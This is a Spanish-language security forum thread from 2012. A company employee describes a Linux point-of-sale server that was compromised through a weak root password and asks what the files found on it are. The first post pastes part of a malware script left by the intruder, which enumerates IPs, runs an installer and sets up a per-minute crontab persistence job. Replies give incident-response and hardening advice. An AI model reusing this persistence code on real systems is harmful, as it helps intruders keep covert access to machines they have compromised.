elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderador: r32)
| | |-+  Hackearon la empresa -confirmado
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Hackearon la empresa -confirmado  (Leído 4,742 veces)
E5150

Desconectado Desconectado

Mensajes: 36



Ver Perfil
Hackearon la empresa -confirmado
« en: 1 Abril 2012, 04:05 am »

saludos para todos

les cuento:

trabajo para una empresa dedicada ala compra y venta de insumos farmacologicos, en los puntos de venta tenemos instalado el sistema operativo: Centos y en otros red hat o sea todo lo trabajamos con linux y ademas tenemos un software empresarial q tambien solo funciona con linux...hace poco instalamos un nuevo punto con Centos y con un nuevo motor de base de datos: Postgres ya que normalmente utilizamos Informix... tuvimos el descuido en dejar una clave de root muy facil y despues de unos dias nos dimos cuenta que ni siquiera podiamos entrar por ssh (desde otro pc) y tampoco en el punto de venta, luego de varios procedimientos logramos ingresar por root y pues encontramos una carpeta sospechosa, se llama asi  /opt  y estaba en /root

dentro de esta carpeta hay dos subcarpetas llamadas aubit4gl (averigue es un emulador de base de datos)   y  la otra: bomfunk (no se que es)
dentro de aubit4gl hay mas subcarpetas con archivos planos los cuales tienen codigo sql y otras cosas mas por ej: hay una subcarpeta /bin con archivos: adbaccess, adecompile, amake, sql_parse, otra subcarpeta /etc con archivos boostrap, configsub  y hay muchos mas archivos la otra bomfunk tiene mas archivos  con codigos y textos en ingles como si fueran conversaciones

entons pregunto
-todo esto hace parte de algun programa?
-cual es la finalidad de estos programas?
-que tan grave es?
-que debo hacer para evitarlos?

agradezco la ayuda y colaboracion---

un archivo de esos dice asi (si alguien sabe y me informa que significa)
#!/bin/bash
if [ $# != 1 ]; then
   echo "######Un cadou de la Riko pentru Bomfunk######"
       echo "#+#+#+ bine lucrat hackere !!"
        echo "Tasteaza : ./start canal "
   echo "P.S : fara diez!"
        exit;
fi
/sbin/ifconfig | grep -v "inet6" |grep "inet" | tr ':' ' '| awk '{ print $3 }' |grep -v "127.0.0.1" > vhosts
nrs=`cat vhosts | grep -c .`
######variabile######
D=1
B=./vhosts
######install######
echo "######Un cadou de la Riko pentru Bomfunk######"
echo "@@@@ bine lucrat hackere !!"
sleep 1
echo "Am gasit $nrs ip-uri"
sleep 1
while read line; do
   ./inst $1 $line
case "$D" in
"1")
echo -e "\b\.\c"
D=2
echo -e "\b\...\c"
D=4
;;
"4")
echo -e "\b\....\c"
D=1
;;
esac
 done < $B
echo -e "\bGata"
./autorun
./run
#!/bin/sh
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
echo "#!/bin/sh
if test -r $dir/m.pid; then
pid=\$(cat $dir/m.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir


En línea

Elemental Code


Desconectado Desconectado

Mensajes: 622


Im beyond the system


Ver Perfil
Re: Hackearon la empresa -confirmado
« Respuesta #1 en: 1 Abril 2012, 07:16 am »

malas noticias?

Código:
http://translate.google.com/#auto|es|Un%20cadou%20de%20la%20Rio%20pentru%20Bomfunk%20bine%20lucrat%20haker%20!!%0A


En línea

I CODE FOR $$$
Programo por $$$
Hago tareas, trabajos para la facultad, lo que sea en VB6.0

Mis programas
rassiel

Desconectado Desconectado

Mensajes: 83


Ver Perfil
Re: Hackearon la empresa -confirmado
« Respuesta #2 en: 1 Abril 2012, 11:21 am »

pues han conseguido comprometer tu sistema, el idioma de los echo es rumano, tal vez t de una pista revisa los logs del server cambia el pass del root por uno robusto elimina esos archivos y verifica no se haya filtrado ninguna info sensible instala un firewall e intenta instalar algun mecanismo contra ataques de fuerza bruta o diccionarios al pass, intenta declarar algun filtrado ip y si es posible mac e ip juntos para loguearse como root por ejemplo solo se puede loguear como root 127.0.0.1 o sea la ip del localhost la cual es muy dificil de spoofear salu2
En línea

E5150

Desconectado Desconectado

Mensajes: 36



Ver Perfil
Re: Hackearon la empresa -confirmado
« Respuesta #3 en: 3 Abril 2012, 03:30 am »

gracias por las respuestas , pero me surjen dudas: como hicieron para metersere? con fuerza bruta?? esos codigos q significan ??y si ya cambie la clave de root ya no tendria problemas?
En línea

E5150

Desconectado Desconectado

Mensajes: 36



Ver Perfil
Re: Hackearon la empresa -confirmado
« Respuesta #4 en: 16 Abril 2012, 04:56 am »

nadie???? alguien q me ayude por fa..necesito recopilar informacion
En línea

el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.637


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Hackearon la empresa -confirmado
« Respuesta #5 en: 17 Abril 2012, 17:43 pm »

Citar
como hicieron para metersere?

Bueno eso es lo que deberías tu investigar. Aunque si se hicieron root de la máquina pueden borrar los logs tranquilamente, e instalar una puerta trasera....

Puedes mirar si hay algún rootkit instalado con el rootkithunter, pero si ves tráfico sospechoso, te recomiendo una reinstalación del sistema limpia.

1) Mira los logs del apache
2) Análisis forense completo de tu máquina
3) Actualizar scripts php, instalar php en modo seguro, suexec, mod_security, tmp en no exec, securizar php, ejemplo:

*) Configuración avanzada PHP + Seguridad en PHP
http://foro.elhacker.net/tutoriales_documentacion/instalar_apache_php_mysql_perl_en_windows_y_linux_configuracion_avanzada-t251.0.html

¿Como puedo saber si un sistema Linux ha sido comprometido? (TEXTO)
http://foro.elhacker.net/hacking_linuxunix/iquestcomo_puedo_saber_si_un_sistema_linux_ha_sido_comprometido_texto-t36767.0.html

DETECTANDO ROOTKITS
http://foro.elhacker.net/seguridad/detectando_rootkits-t85821.0.html

Herramientas Seguridad en Linux
http://foro.elhacker.net/gnulinux/herramientas_seguridad_en_linux-t56677.0.html

Zeppoo v.0.0.2 - Detector de Rootkits
http://foro.elhacker.net/hacking_linuxunix/zeppoo_v002_detector_de_rootkits-t116776.0.html

Que hacer despues de ser atacado
http://foro.elhacker.net/seguridad/que_hacer_despues_de_ser_atacado-t245743.0.html

c99.txt y r57.txt
http://foro.elhacker.net/nivel_web/c99txt_y_r57txt-t214653.0.html
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Diablo III: confirmado « 1 2 »
Juegos y Consolas
wolfbcn 12 5,235 Último mensaje 6 Julio 2008, 23:26 pm
por killer67
¿Hackearon a X foro?
Hacking
Tachikomaia 1 3,312 Último mensaje 5 Junio 2020, 16:59 pm
por el-brujo
Overlord 4 confirmado
Software
M401 3 2,085 Último mensaje 4 Junio 2021, 21:17 pm
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines